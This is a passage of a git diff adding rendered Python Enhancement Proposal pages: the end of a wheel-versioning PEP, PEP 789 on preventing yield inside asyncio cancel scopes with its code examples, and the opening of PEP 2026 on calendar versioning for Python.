While keeping the extension .whl is appealing for many reasons, it presents +several problems that are difficult to surmount. First, current installers +would still pick a new wheel and fail to install the package. Furthermore, +the file name of a wheel would not be able to change without breaking existing +installers that expect a set wheel file name format. While the current filename +specification for wheels is sufficient for current usage, the optional +build tag in the middle of the file name makes any extensions ambiguous (i.e. +foo-0.3-py3-none-any-fancy_new_tag.whl would parse as the build tag being +py3). This limits changes to information stored in the wheel file name.
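A toy parser makes the ambiguity concrete; this is a sketch of the current filename convention, not any real installer’s code:

def parse_wheel_filename(name):
    # Current convention:
    # {dist}-{version}(-{build})?-{python}-{abi}-{platform}.whl
    parts = name.removesuffix(".whl").split("-")
    dist, version = parts[0], parts[1]
    build = parts[2] if len(parts) == 6 else None
    python_tag, abi_tag, platform_tag = parts[-3:]
    return dist, version, build, python_tag, abi_tag, platform_tag

# An extra trailing component shifts every field: the optional build
# tag slot absorbs "py3" and the real tags are misread.
print(parse_wheel_filename("foo-0.3-py3-none-any-fancy_new_tag.whl"))
# ('foo', '0.3', 'py3', 'none', 'any', 'fancy_new_tag')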

+
+
+

Store the Wheel Major Version in the File Extension (.whl2)

+

Storing the wheel major version in the file extension has several nice +advantages. For one, there is no need to introduce the Wheel-Version +metadata field, since installers could simply filter based on file extension. +This would also allow future side-by-side packages. However, changing the +extension for wheels each major version has some downsides. First, the version +stored in the WHEEL file must match the file extension, and this would need +to be verified by installers. Additionally, many systems associate file type by +file extension (e.g. executable associations, various web caching software), +and these would need to be updated every version that is released. Furthermore, +part of the brittleness of the current wheel specification is that so much +metadata is stored in the filename. Filenames are not well suited to store +structured data. Moving away from encoding information in the filename should +be a goal of future wheel revisions.

+

Another possibility is to use the file extension to encode the outer container +format (i.e. a ZIP file containing .dist-info) separate from the inner +wheel version. However, this could lead to confusion if the file extension and +inner Wheel-Version diverge. If an installer raises an error due to an +incompatible wheel 3.0 as obtained from the wheel metadata, some users will +be confused by the difference from the file extension .whl2.

+
+
+

Wheel 2.0 Should Change the Outer Container Format

+

Since wheel 2.0 will change the extension of wheel files, it is the best +opportunity to modify the outer container format. Compatibility does not need +to be kept with a different file extension that tools will need to opt-in to +reading. The main use-case for a different exterior compression format would +be better compression. For example, the outer container could be changed into +a Zstandard tarfile, .tar.zst, which +would decompress faster and produce smaller wheels. However, there are several +practical issues with this. First, Zstandard is not part of the Python standard +library, so pure-Python packaging tools would need to ship an extension to +unpack these wheels. This could cause some compatibility issues for several +platforms where extension modules are not easy to install. Furthermore, a +future wheel revision could always introduce a new layout of non-metadata files +that uses a .tar.zst inside the existing ZIP-based format.

+

Finally, it is not a good idea to change the wheel file format too much at +once. The goal of this PEP is to make evolving the specification easier, and +part of the rationale behind making wheel evolution easier is to avoid “all +at once” changes. Changing the outer file format for wheels would require +re-writing how package metadata is not only discovered, but also installed.

+
+
+

Why not Specify Wheel 2.0 In This PEP?

+

There are many features that could be included as part of wheel 2.0, but this PEP does not cover them. The goal of this PEP is to define a compatibility story for the wheel file format. Changes that do not pertain to compatibility for wheel versions do not need to be in this PEP, and should be introduced in follow-up PEPs defining new wheel features.

+
+
+
+

Discussion Topics

+
+

Should Indices Support Dual-publishing for the First Migration?

+

Since .whl and .whlx will look different in file name, they could be uploaded side-by-side to package indices like PyPI. This has some nice benefits, like dual-support for older and newer installers: users on new installers get the latest features, while users who don’t upgrade can still install the latest version of a package.

+

There are many complications however. Should we allow wheel 2 uploads to +existing wheel 1-only releases? Should we put any requirements on the +side-by-side wheels, such as:

+
+

Constraints on dual-published wheels

+

A given index may contain identical-content wheels with different wheel +versions, and installers should prefer the newest-available wheel format, +with all other factors held constant.

+
+

Should we only allow uploading both with PEP 694 allowing “atomic” +dual-publishing?

+
+
+
+

Acknowledgements

+

The author of this PEP is greatly indebted to the incredibly valuable review, +advice, and feedback of Barry Warsaw and Michael Sarahan.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0777.rst

+

Last modified: 2024-10-15 22:48:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0789/index.html b/pep-0789/index.html new file mode 100644 index 00000000000..a09fda1a503 --- /dev/null +++ b/pep-0789/index.html @@ -0,0 +1,753 @@ + + + + + + + + PEP 789 – Preventing task-cancellation bugs by limiting yield in async generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 789 – Preventing task-cancellation bugs by limiting yield in async generators

+
+
Author:
+
Zac Hatfield-Dodds <zac at zhd.dev>, +Nathaniel J. Smith <njs at pobox.com>
+
PEP-Delegate:
+

+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
14-May-2024
+
Python-Version:
+
3.14
+
+
+
+
Table of Contents +
+
+

Abstract

+

Structured concurrency is increasingly popular in Python. Interfaces such as +the asyncio.TaskGroup and asyncio.timeout context managers support +compositional reasoning, and allow developers to clearly scope the lifetimes of +concurrent tasks. However, using yield to suspend a frame inside such a +context leads to situations where the wrong task is canceled, timeouts are +ignored, and exceptions are mishandled. More fundamentally, suspending a frame +inside a TaskGroup violates the structured concurrency design principle that +child tasks are encapsulated within their parent frame.

+

To address these issues, this PEP proposes a new sys.prevent_yields() context +manager. When syntactically inside this context, attempting to yield will +raise a RuntimeError, preventing the task from yielding. Additionally, a +mechanism will be provided for decorators such as @contextmanager to allow +yields inside the decorated function. sys.prevent_yields() will be used by +asyncio and downstream libraries to implement task groups, timeouts, and +cancellation; and a related mechanism by contextlib etc. to convert +generators into context managers which allow safe yields.

+
+
+

Background

+

Structured concurrency is increasingly popular in Python, in the form of newer +asyncio interfaces and third-party libraries such as Trio and anyio. +These interfaces support compositional reasoning, so long as users never write +a yield which suspends a frame while inside a cancel scope.

+

A cancel scope is a context manager which can… cancel… whatever work occurs +within that context (…scope). In asyncio, this is implicit in the design of +with asyncio.timeout(): or async with asyncio.TaskGroup() as tg:, which +respectively cancel the contained work after the specified duration, or cancel +sibling tasks when one of them raises an exception. The core functionality of +a cancel scope is synchronous, but the user-facing context managers may be +either sync or async. [1] [2]

+

This structured approach works beautifully, unless you hit one specific sharp +edge: breaking the nesting structure by yielding inside a cancel scope. +This has much the same effect on structured control flow as adding just a few +cross-function gotos, and the effects are truly dire:

+
    +
  • The wrong task can be canceled, whether due to a timeout, an error in a +sibling task, or an explicit request to cancel some other task
  • +
  • Exceptions, including CancelledError, can be delivered to the wrong task
  • +
  • Exceptions can go missing entirely, being dropped instead of added to an +ExceptionGroup
  • +
+
+
+

Problem statement

+

Here’s the fundamental issue: yield suspends a call frame. It only makes sense +to yield in a leaf frame – i.e., if your call stack goes like A -> B -> C, then +you can suspend C, but you can’t suspend B while leaving C running.

+

But, TaskGroup is a kind of “concurrent call” primitive, where a single frame +can have multiple child frames that run concurrently. This means that if we +allow people to mix yield and TaskGroup, then we can end up in exactly this +situation, where B gets suspended but C is actively running. This is +nonsensical, and causes serious practical problems (e.g., if C raises an +exception and A has returned, we have no way to propagate it).

+

This is a fundamental incompatibility between generator control flow and +structured concurrency control flow, not something we can fix by tweaking our +APIs. The only solution seems to be to forbid yield inside a TaskGroup.

+

Although timeouts don’t leave a child task running, the close analogy and +related problems lead us to conclude that yield should be forbidden inside all +cancel scopes, not only TaskGroups. See Can’t we just deliver exceptions to the right place? for discussion.

+
+
+

Motivating examples

+

Let’s consider three examples, to see what this might look like in practice.

+
+

Leaking a timeout to the outer scope

+

Suppose that we want to iterate over an async iterator, but wait for at most +max_time seconds for each element. We might naturally encapsulate the logic +for doing so in an async generator, so that the call site can continue to use a +straightforward async for loop:

+
async def iter_with_timeout(ait, max_time):
+    try:
+        while True:
+            with timeout(max_time):
+                yield await anext(ait)
+    except StopAsyncIteration:
+        return
+
+async def fn():
+    async for elem in iter_with_timeout(ait, max_time=1.0):
+        await do_something_with(elem)
+
+
+

Unfortunately, there’s a bug in this version: the timeout might expire after the +generator yields but before it is resumed! In this case, we’ll see a +CancelledError raised in the outer task, where it cannot be caught by the +with timeout(max_time): statement.

+

The fix is fairly simple: get the next element inside the timeout context, and +then yield outside that context.

+
async def correct_iter_with_timeout(ait, max_time):
+    try:
+        while True:
+            with timeout(max_time):
+                tmp = await anext(ait)
+            yield tmp
+    except StopAsyncIteration:
+        return
+
+
+
+
+

Leaking background tasks (breaks cancellation and exception handling)

+

Timeouts are not the only interface which wrap a cancel scope - and if you +need some background worker tasks, you can’t simply close the TaskGroup +before yielding.

+

As an example, let’s look at a fan-in generator, which we’ll use to merge the +feeds from several “sensors”. We’ll also set up our mock sensors with a small +buffer, so that we’ll raise an error in the background task while control flow +is outside the combined_iterators generator.

+
import asyncio, itertools
+
+async def mock_sensor(name):
+    for n in itertools.count():
+        await asyncio.sleep(0.1)
+        if n == 1 and name == "b":  # 'presence detection'
+            yield "PRESENT"
+        elif n == 3 and name == "a":  # inject a simple bug
+            print("oops, raising RuntimeError")
+            raise RuntimeError
+        else:
+            yield f"{name}-{n}"  # non-presence sensor data
+
+async def move_elements_to_queue(ait, queue):
+    async for obj in ait:
+        await queue.put(obj)
+
+async def combined_iterators(*aits):
+    """Combine async iterators by starting N tasks, each of
+    which move elements from one iterable to a shared queue."""
+    q = asyncio.Queue(maxsize=2)
+    async with asyncio.TaskGroup() as tg:
+        for ait in aits:
+            tg.create_task(move_elements_to_queue(ait, q))
+        while True:
+            yield await q.get()
+
+async def turn_on_lights_when_someone_gets_home():
+    combined = combined_iterators(mock_sensor("a"), mock_sensor("b"))
+    async for event in combined:
+        print(event)
+        if event == "PRESENT":
+            break
+    print("main task sleeping for a bit")
+    await asyncio.sleep(1)  # do some other operation
+
+asyncio.run(turn_on_lights_when_someone_gets_home())
+
+
+

When we run this code, we see the expected sequence of observations, then a +‘detection’, and then while the main task is sleeping we trigger that +RuntimeError in the background. But… we don’t actually observe the +RuntimeError, not even as the __context__ of another exception!

+
>> python3.11 demo.py
+a-0
+b-0
+a-1
+PRESENT
+main task sleeping for a bit
+oops, raising RuntimeError
+
+Traceback (most recent call last):
+  File "demo.py", line 39, in <module>
+    asyncio.run(turn_on_lights_when_someone_gets_home())
+  ...
+  File "demo.py", line 37, in turn_on_lights_when_someone_gets_home
+    await asyncio.sleep(1)  # do some other operation
+  File ".../python3.11/asyncio/tasks.py", line 649, in sleep
+    return await future
+asyncio.exceptions.CancelledError
+
+
+

Here, again, the problem is that we’ve yielded inside a cancel scope; +this time the scope which a TaskGroup uses to cancel sibling tasks when one +of the child tasks raises an exception. However, the CancelledError which +was intended for the sibling task was instead injected into the outer task, +and so we never got a chance to create and raise an +ExceptionGroup(..., [RuntimeError()]).

+

To fix this, we need to turn our async generator into an async context manager, +which yields an async iterable - in this case a generator wrapping the queue; in +future perhaps the queue itself:

+
async def queue_as_aiterable(queue):
+    # async generators that don't `yield` inside a cancel scope are fine!
+    while True:
+        try:
+            yield await queue.get()
+        except asyncio.QueueShutDown:
+            return
+
+@asynccontextmanager  #  yield-in-cancel-scope is OK in a context manager
+async def combined_iterators(*aits):
+    q = asyncio.Queue(maxsize=2)
+    async with asyncio.TaskGroup() as tg:
+        for ait in aits:
+            tg.create_task(move_elements_to_queue(ait, q))
+        yield queue_as_aiterable(q)
+
+async def turn_on_lights_when_someone_gets_home():
+    ...
+    async with combined_iterators(...) as ait:
+        async for event in ait:
+            ...
+
+
+
+
+

In a user-defined context manager

+

Yielding inside a cancel scope can be safe, if and only if you’re using the +generator to implement a context manager [3] - in this case any +propagating exceptions will be redirected to the expected task.

+

We’ve also implemented the ASYNC101 linter rule in flake8-async, which warns against yielding in +known cancel scopes. Could user education be sufficient to avoid these +problems? Unfortunately not: user-defined context managers can also wrap a +cancel scope, and it’s infeasible to recognize or lint for all such cases.

+

This regularly arises in practice, because ‘run some background tasks for the +duration of this context’ is a very common pattern in structured concurrency. +We saw that in combined_iterators() above; and have seen this bug in +multiple implementations of the websocket protocol:

+
async def get_messages(websocket_url):
+    # The websocket protocol requires background tasks to manage the socket heartbeat
+    async with open_websocket(websocket_url) as ws:  # contains a TaskGroup!
+        while True:
+            yield await ws.get_message()
+
+async for message in get_messages(websocket_url):
+    ...
+
+
+
+
+
+

Specification

+

To prevent these problems, we propose:

+
    +
1. a new context manager, with sys.prevent_yields(reason): ... which will raise a RuntimeError if you attempt to yield while inside it. [4] Cancel-scope-like context managers in asyncio and downstream code can then wrap this to prevent yielding inside their with-block.
2. a mechanism by which generator-to-context-manager decorators can allow yields across one call. We’re not yet sure what this should look like; the leading candidates are:
   1. a code-object attribute, fn.__code__.co_allow_yields = True, or
   2. some sort of invocation flag, e.g. fn.__invoke_with_yields__, to avoid mutating a code object that might be shared between decorated and undecorated functions
+
+

Implementation - tracking frames

+

The new sys.prevent_yields context manager will require interpreter support. +For each frame, we track the entries and exits of this context manager.

+

We’re not particularly attached to the exact representation; we’ll discuss it as +a stack (which would support clear error messages), but more compact +representations such as pair-of-integers would also work.

+
    +
  • When entering a newly-created or resumed frame, initialize empty stacks of +entries and exits.
  • +
  • When returning from a frame, merge these stacks into that of the parent frame.
  • +
  • When yielding:
      +
    • if entries != [] and not frame.allow_yield_flag, raise a RuntimeError +instead of yielding (the new behavior this PEP proposes)
    • +
    • otherwise, merge stacks into the parent frame as for a return.
    • +
    +
  • +
+

Because this is about yielding frames within a task, not switching between +tasks, syntactic yield and yield from should be affected, but await +expressions should not.

+

We can reduce the overhead by storing this metadata in a single stack per thread +for all stack frames which are not generators.
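A toy model of this bookkeeping may help; the real mechanism would live in the interpreter, and names such as allow_yield_flag simply follow the description above:

class FrameState:
    """Per-frame tracking of sys.prevent_yields enters/exits."""
    def __init__(self, parent=None, allow_yield_flag=False):
        self.parent = parent
        self.allow_yield_flag = allow_yield_flag
        self.entries = []  # records from prevent_yields.__enter__
        self.exits = []    # records from prevent_yields.__exit__

    def _merge_into_parent(self):
        # Hand any unbalanced enter/exit records to the calling frame.
        if self.parent is not None:
            self.parent.entries += self.entries
            self.parent.exits += self.exits
        self.entries, self.exits = [], []

    def on_return(self):
        self._merge_into_parent()

    def on_yield(self):
        # The new behavior this PEP proposes: refuse to suspend a
        # frame with unbalanced prevent_yields entries.
        if self.entries and not self.allow_yield_flag:
            raise RuntimeError("attempted to yield inside sys.prevent_yields()")
        self._merge_into_parent()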

+
+
+

Worked examples

+
+

No-yield example

+

In this example, we see multiple rounds of the stack merging as we unwind from +sys.prevent_yields, through the user-defined ContextManager, back to the +original Frame. For brevity, the reason for preventing yields is not shown; +it is part of the “1 enter” state.

[Image: pep-789-example-no-yield.png]

With no yield we don’t raise any errors, and because the number of enters +and exits balance the frame returns as usual with no further tracking.

+
+
+

Attempts-to-yield example

+

In this example, the Frame attempts to yield while inside the +sys.prevent_yields context. This is detected by the interpreter, +which raises a RuntimeError instead of suspending the frame.

[Image: pep-789-example-yield-errors.png]
+
+

Allowed-to-yield example

+

In this example, a decorator has marked the Frame as allowing yields. This +could be @contextlib.contextmanager or a related decorator.

[Image: pep-789-example-yield-allowed.png]

When the Frame is allowed to yield, the entry/exit stack is merged into the +parent frame’s stack before suspending. When the Frame resumes, its stack is +empty. Finally, when the Frame exits, the exit is merged into the parent +frame’s stack, rebalancing it.

+

This ensures that the parent frame correctly inherits any remaining +sys.prevent_yields state, while allowing the Frame to safely suspend +and resume.

+
+
+

Allowing yield for context managers

+

TODO: this section is a placeholder, pending a decision on the mechanism for +``@contextmanager`` to re-enable yields in the wrapped function.

+
    +
  • Explain and show a code sample of how @asynccontextmanager sets the flag
  • +
+

Note that third-party decorators such as @pytest.fixture demonstrate that +we can’t just have the interpreter special-case contextlib.

+
+
+
+

Behavior if sys.prevent_yields is misused

+

While unwise, it’s possible to call sys.prevent_yields.__enter__ and +.__exit__ in an order that does not correspond to any valid nesting, or get +an invalid frame state in some other way.

+

There are two ways sys.prevent_yields.__exit__ could detect an invalid state. First, if yields are not prevented, we can simply raise an exception without changing the state. Second, if an unexpected entry is at the top of the stack, we suggest popping that entry and raising an exception. This ensures that out-of-order calls will still clear the stack, while making it clear that something is wrong.

+

(and if we choose e.g. an integer- rather than stack-based representation, such +states may not be distinguishable from correct nesting at all, in which case the +question will not arise)

+
+
+
+

Anticipated uses

+

In the standard library, sys.prevent_yields could be used by +asyncio.TaskGroup, asyncio.timeout, and asyncio.timeout_at. +Downstream, we expect to use it in trio.CancelScope, async fixtures (in +pytest-trio, anyio, etc.), and perhaps other places.

+

We consider use-cases unrelated to async correctness, such as preventing +decimal.localcontext from leaking out of a generator, out of scope for this +PEP.

+

The generator-to-context-manager support would be used by +@contextlib.(async)contextmanager, and if necessary in (Async)ExitStack.

+
+
+

Backwards Compatibility

+

The addition of the sys.prevent_yields context manager, changes to +@contextlib.(async)contextmanager, and corresponding interpreter +support are all fully backwards-compatible.

+

Preventing yields inside asyncio.TaskGroup, asyncio.timeout, and asyncio.timeout_at would be a breaking change to at least some code in the wild, which (however unsafe and prone to the motivating problems above) may work often enough to make it into production.

+

We will seek community feedback on appropriate deprecation pathways for +standard-library code, including the suggested length of any deprecation period. +As an initial suggestion, we could make suspending stdlib contexts emit a +DeprecationWarning only under asyncio debug mode in 3.14; then transition to +warn-by-default and error under debug mode in 3.15; and finally a hard error in +3.16.

+

Irrespective of stdlib usage, downstream frameworks would adopt this +functionality immediately.

+
+

How widespread is this bug?

+

We don’t have solid numbers here, but believe that many projects are affected in +the wild. Since hitting a moderate and a critical bug attributed to suspending +a cancel scope in the same week at work, we’ve used static analysis with some success. Three +people Zac spoke to at PyCon recognized the symptoms and concluded that they had +likely been affected.

+

TODO: run the ASYNC101 lint rule across ecosystem projects, e.g. the aio-libs +packages, and get some sense of frequency in widely-used PyPI packages? +This would help inform the break/deprecation pathways for stdlib code.

+
+
+
+

How to Teach This

+

Async generators are very rarely taught to novice programmers.

+

Most intermediate and advanced Python programmers will only interact with this +PEP as users of TaskGroup, timeout, and @contextmanager. For this +group, we expect a clear exception message and documentation to be sufficient.

+
    +
  • A new section will be added to the developing with asyncio page, which +briefly states that async generators are not permitted to yield when +inside a “cancel scope” context, i.e. TaskGroup or timeout context +manager. We anticipate that the problem-restatement and some parts of the +motivation section will provide a basis for these docs.
      +
    • When working in codebases which avoid async generators entirely [5], +we’ve found that an async context manager yielding an async iterable is a safe +and ergonomic replacement for async generators – and avoids the delayed-cleanup +problems described in PEP 533, which this proposal does not address.
    • +
    +
  • +
  • In the docs for each context manager which wraps a cancel scope, and thus now +sys.prevent_yields, include a standard sentence such as “If used within an +async generator, [it is an error to yield inside this context manager].” +with a hyperlink to the explanation above.
  • +
+

For asyncio, Trio, curio, or other-framework maintainers who implement +cancel scope semantics, we will ensure that the documentation of +sys.prevent_yields gives a full explanation distilled from the solution and +implementation sections of this PEP. We anticipate consulting most such +maintainers for their feedback on the draft PEP.

+
+
+

Rejected alternatives

+
+

PEP 533, deterministic cleanup for iterators

+

PEP 533 proposes adding __[a]iterclose__ to the iterator protocol, essentially wrapping a with [a]closing(ait) around each (async) for loop. While this would be useful for ensuring timely and deterministic cleanup of resources held by iterators (the problem it aims to solve), it does not fully address the issues that motivate this PEP.

+

Even with PEP 533, misfired cancellations would still be delivered to the wrong +task and could wreak havoc before the iterator is closed. Moreover, it does not +address the fundamental structured concurrency problem with TaskGroup, where +suspending a frame that owns a TaskGroup is incompatible with the model of child +tasks being fully encapsulated within their parent frame.

+
+
+

Deprecate async generators entirely

+

At the 2024 language summit, several attendees suggested instead deprecating async +generators in toto. Unfortunately, while the common-in-practice cases all use +async generators, Trio code can trigger the same problem with standard generators:

+
# We use Trio for this example, because while `asyncio.timeout()` is async,
+# Trio's CancelScope type and timeout context managers are synchronous.
+import trio
+
+def abandon_each_iteration_after(max_seconds):
+    # This is of course broken, but I can imagine someone trying it...
+    while True:
+        with trio.move_on_after(max_seconds):
+            yield
+
+@trio.run
+async def main():
+    for _ in abandon_each_iteration_after(max_seconds=1):
+        await trio.sleep(3)
+
+
+

If it wasn’t for the bug in question, this code would look pretty idiomatic - +but after about a second, instead of moving on to the next iteration it raises:

+
Traceback (most recent call last):
+  File "demo.py", line 10, in <module>
+    async def main():
+  File "trio/_core/_run.py", line 2297, in run
+    raise runner.main_task_outcome.error
+  File "demo.py", line 12, in main
+    await trio.sleep(3)
+  File "trio/_timeouts.py", line 87, in sleep
+    await sleep_until(trio.current_time() + seconds)
+  ...
+  File "trio/_core/_run.py", line 1450, in raise_cancel
+    raise Cancelled._create()
+trio.Cancelled: Cancelled
+
+
+

Furthermore, there are some non-cancel-scope synchronous context managers which +exhibit related problems, such as the abovementioned decimal.localcontext. +While fixing the example below is not a goal of this PEP, it demonstrates that +yield-within-with problems are not exclusive to async generators:

+
import decimal
+
+def why_would_you_do_this():
+    with decimal.localcontext(decimal.Context(prec=1)):
+        yield
+
+one = decimal.Decimal(1)
+print(one / 3)  # 0.3333333333333333333333333333
+next(gen := why_would_you_do_this())
+print(one / 3)  # 0.3
+
+
+

While I’ve had good experiences in async Python without async generators [5], I’d prefer to fix the problem rather than remove them from the language.

+
+
+

Can’t we just deliver exceptions to the right place?

+

If we implemented PEP 568 (Generator-sensitivity for Context Variables; see +also PEP 550), it would be possible to handle exceptions from timeouts: the +event loop could avoid firing a CancelledError until the generator frame +which contains the context manager is on the stack - either when the generator +is resumed, or when it is finalized.

+

This can take arbitrarily long; even if we implemented PEP 533 to ensure +timely cleanup on exiting (async) for-loops it’s still possible to drive a +generator manually with next/send.

+

However, this doesn’t address the other problem with TaskGroup. The model +for generators is that you put a stack frame in suspended animation and can then +treat it as an inert value which can be stored, moved around, and maybe +discarded or revived in some arbitrary place. The model for structured +concurrency is that your stack becomes a tree, with child tasks encapsulated +within some parent frame. They’re extending the basic structured programming +model in different, and unfortunately incompatible, directions.

+

Suppose for example that suspending a frame containing an open TaskGroup +also suspended all child tasks. This would preserve the ‘downward’ structured +concurrency, in that children remain encapsulated - albeit at the cost of +deadlocking both of our motivating examples, and much real-world code. +However, it would still be possible to resume the generator in a different +task, violating the ‘upwards’ invariant of structured concurrency.

+

We don’t think it’s worth adding this much machinery to handle cancel scopes, +while still leaving task groups broken.

+
+
+

Alternative implementation - inspecting bytecode

+

Jelle Zijlstra has sketched an alternative, where sys.prevent_yields inspects the bytecode of callers until satisfied that there is no yield between the calling instruction pointer and the next context exit. We expect that support for syntactically-nested context managers could be added fairly easily.

+

However, it’s not yet clear how this would work when user-defined context +managers wrap sys.prevent_yields. Worse, this approach ignores explicit +calls to __enter__() and __exit__(), meaning that the context management +protocol would vary depending on whether the with statement was used.

+

The ‘only pay if you use it’ performance cost is very attractive. However, +inspecting frame objects is prohibitively expensive for core control-flow +constructs, and causes whole-program slowdowns via de-optimization. +On the other hand, adding interpreter support for better performance leads +back to the same pay-regardless semantics as our preferred solution above.

+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0789.rst

+

Last modified: 2024-06-04 01:45:13 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0801/index.html b/pep-0801/index.html new file mode 100644 index 00000000000..19b48dff3a4 --- /dev/null +++ b/pep-0801/index.html @@ -0,0 +1,133 @@ + + + + + + + + PEP 801 – Reserved | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+ + +
+ + + + + \ No newline at end of file diff --git a/pep-2026/index.html b/pep-2026/index.html new file mode 100644 index 00000000000..04d7925f3bb --- /dev/null +++ b/pep-2026/index.html @@ -0,0 +1,1030 @@ + + + + + + + + PEP 2026 – Calendar versioning for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 2026 – Calendar versioning for Python

+
+
Author:
+
Hugo van Kemenade
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Process
+
Created:
+
11-Jun-2024
+
Python-Version:
+
3.26
+
Post-History:
+
14-Jun-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes updating the versioning scheme for Python to include +the calendar year.

+

Calendar Versioning (CalVer) makes everything easier to translate into +calendar time rather than counting versions and looking up when they will be +(or were) released:

+
    +
  • The support lifecycle is clear, +making it easy to see when a version was first released.
  • +
  • Deprecations are easier to manage for maintainers and users.
  • +
  • It’s easier to work out when a version will reach end of life (EOL).
  • +
  • It helps people, especially new learners, understand how old their installation is.
  • +
  • It’s easier to reason about which versions of Python to support +for libraries and applications.
  • +
+

Starting with what would have been Python 3.15, +the version is 3.YY.micro where YY is the year of initial release:

+
    +
  • Python 3.26 will be released in 2026 instead of Python 3.15. +EOL is five years after initial release, +therefore Python 3.26 will reach EOL in 2031.
  • +
  • Python 3.27 will be released in 2027, and so on.
  • +
+
+
+

Motivation and rationale

+

In 2019, we adopted an annual release cycle with PEP 602, which opened the +door for calendar versioning:

+
+
Adopting an annual release calendar allows for natural switching to calendar +versioning, for example by calling Python 3.9 “Python 3.20” since it’s +released in October ‘20 and so on (“Python 3.23” would be the one released +in October ‘23).

While the ease of switching to calendar versioning can be treated as an +advantage of an annual release cycle, this PEP does not advocate for or +against a change in how Python is versioned. Should the annual release +cycle be adopted, the versioning question will be dealt with in a separate +PEP.

+
+

This is that PEP.

+
+

Current scheme

+

From the General Python FAQ: +How does the Python version numbering scheme work?

+
+
Python versions are numbered “A.B.C” or “A.B”:
    +
  • A is the major version number +– it is only incremented for really major changes in the language.
  • +
  • B is the minor version number +– it is incremented for less earth-shattering changes.
  • +
  • C is the micro version number +– it is incremented for each bugfix release.
  • +
+
+
+
+

Python predates SemVer

+

Semantic Versioning (SemVer) +is a popular scheme which aims to communicate the intent of a release (though it +doesn’t always succeed).

+
+
Given a version number MAJOR.MINOR.PATCH, increment the:
    +
1. MAJOR version when you make incompatible API changes
2. MINOR version when you add functionality in a backward compatible manner
3. PATCH version when you make backward compatible bug fixes
+
+

People often assume Python follows SemVer and +complain +about +breaking +changes +in feature +releases. +But Python predates SemVer by at least 15 years: +the SemVer spec was introduced in 2009 +and the bespoke Python scheme was added to source control in 1994 +for the 1.0 release.

+

If Python adopted SemVer, that would imply a new major bump every year when +we remove deprecations.

+

Instead of SemVer, however, some projects have adopted another versioning +scheme based on the calendar.

+
+
+

Calendar versioning

+

With Calendar Versioning (CalVer), +you include some element of the date in the version number. +For example, +Ubuntu and Black use the year and month – Ubuntu 24.04 came out in April 2024; +pip and PyCharm use only the year.

Ubuntu        Black         pip              PyCharm
YY.0M.micro   YY.MM.micro   YY.minor.micro   YYYY.minor.micro
23.04         23.12.1       23.3             2023.3.5
23.10         24.1.0        23.3.1           2024.1
24.04         24.1.1        23.3.2           2024.1.1
24.10         24.2.0        24.0             2024.1.2

And here are some programming language standards, +all using some form of the year:

Ada         Algol   C    C++   Fortran     ECMAScript (aka JavaScript)
YY / YYYY   YY      YY   YY    YY / YYYY   YYYY
83          58      89   98    66          2020
95          60      99   03    90          2021
2012        68      11   11    2003        2022
2022                23   23    2023        2023
+

Annual release cadence

+

Since 2019, we’ve made a release each year:

+
    +
  • 3.15.0 will be released in 2026
  • +
  • 3.16.0 will be released in 2027
  • +
  • 3.17.0 will be released in 2028
  • +
  • 3.18.0 will be released in 2029
  • +
  • 3.19.0 will be released in 2030
  • +
+

This is sort of calendar-based; it’s just offset by 11 years.

+
+
+

CalVer for Python

+

The simplest CalVer option would be to stick with major version 3, +and encode the year in the minor version:

+
    +
  • 3.26.0 will be released in 2026
  • +
  • 3.27.0 will be released in 2027
  • +
  • 3.28.0 will be released in 2028
  • +
  • 3.29.0 will be released in 2029
  • +
  • 3.30.0 will be released in 2030
  • +
+

For example, 3.26 will be released in 2026. +It makes it obvious when a release first came out.

+
+
+

Clarity of deprecation removal

+

Warnings for deprecations often mention the version they will be removed in. +For example:

+
+
DeprecationWarning: ‘ctypes.SetPointerType’ is deprecated and slated for +removal in Python 3.15
+

However, once aware of CalVer, it is immediately obvious from the warning how +long you have to take action:

+
+
DeprecationWarning: ‘ctypes.SetPointerType’ is deprecated and slated for +removal in Python 3.26
+
+
+

Clarity of support lifecycle

+

Right now, it’s a little tricky to work out when a release is end-of-life. +First you have to look up when it was initially released, then add 5 years:

+
+
“When will Python 3.11 be EOL?”

“Well, let’s see… PEP 664 is the 3.11 release schedule, it says 3.11 was +released in 2022, EOL after 5 years, so 2022 + 5 = 2027.”

+
+

But if the initial release year is right there in the version, +it’s much easier:

+
+
“When will Python 3.26 be EOL?”

“26 + 5 = [20]31”

+
+
+
+

Clarity of installation age

+

With the year in the version, it’s easier to work out how old your installation +is. For example, with the current scheme, if you’re using Python 3.15 in 2035, +it’s not immediately clear that it was first released in 2026 (and has been EOL +since 2031).

+

With knowledge of CalVer, if you’re using Python 3.26 in 2035, it’s clear it was +first released nine years ago and it’s probably time to upgrade.

+

This can help prompt people to switch to supported releases still under security +support, and help in teaching new users who may have older installations.

+
+
+

Clarity of version support

+

CalVer makes it easier to reason about which versions of Python to support.

+

For example, without CalVer, setting your minimum compatible Python version to +3.19 in 2031 sets an aggressive assumption regarding version adoption and +support.

+

However, with CalVer, this is more obvious if setting the minimum to 3.30 in +2031. For wider support, perhaps you prefer setting it to 3.26.

+

Similarly, library maintainers supporting all CPython upstream versions +need to test against five versions (or six including the pre-release).

+

For example, in 2030, the supported versions without CalVer would be:

+
    +
  • 3.15, 3.16, 3.17, 3.18, 3.19
  • +
+

With CalVer they would be:

+
    +
  • 3.26, 3.27, 3.28, 3.29, 3.30
